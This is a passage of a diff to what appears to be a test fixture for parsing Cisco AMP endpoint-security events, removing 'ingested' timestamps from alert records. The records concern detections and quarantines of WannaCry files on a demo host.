pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2102,7 +2076,6 @@ ], "code": "1090519054", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212736406Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 
@@ -2199,7 +2172,6 @@ ], "code": "1090519054", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212737316Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 
@@ -2296,7 +2268,6 @@ ], "code": "1090519054", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212738148Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 
@@ -2397,7 +2368,6 @@ ], "code": "1090519054", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212738960Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 
@@ -2492,7 +2462,6 @@ ], "code": "553648143", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212739795Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 2 
@@ -2564,7 +2533,6 @@ ], "code": "553648143", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212740666Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 2 
@@ -2636,7 +2604,6 @@ ], "code": "553648143", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212741591Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "severity": 2 
@@ -2708,7 +2675,6 @@ ], "code": "553648143", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212742400Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "severity": 2 
@@ -2780,7 +2746,6 @@ ], "code": "553648143", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212743353Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2856,7 +2821,6 @@ ], "code": "2164260880", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212744169Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2932,7 +2896,6 @@ ], "code": "2164260880", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212744985Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -3008,7 +2971,6 @@ ], "code": "2164260880", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212745851Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -3084,7 +3046,6 @@ ], "code": "2164260880", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212746713Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -3162,7 +3123,6 @@ ], "code": "1090519054", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212747526Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "severity": 2 
@@ -3265,7 +3225,6 @@ ], "code": "1090519054", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212748332Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "severity": 2 
@@ -3362,7 +3321,6 @@ ], "code": "553648143", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212749167Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -3434,7 +3392,6 @@ ], "code": "553648143", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212749977Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat 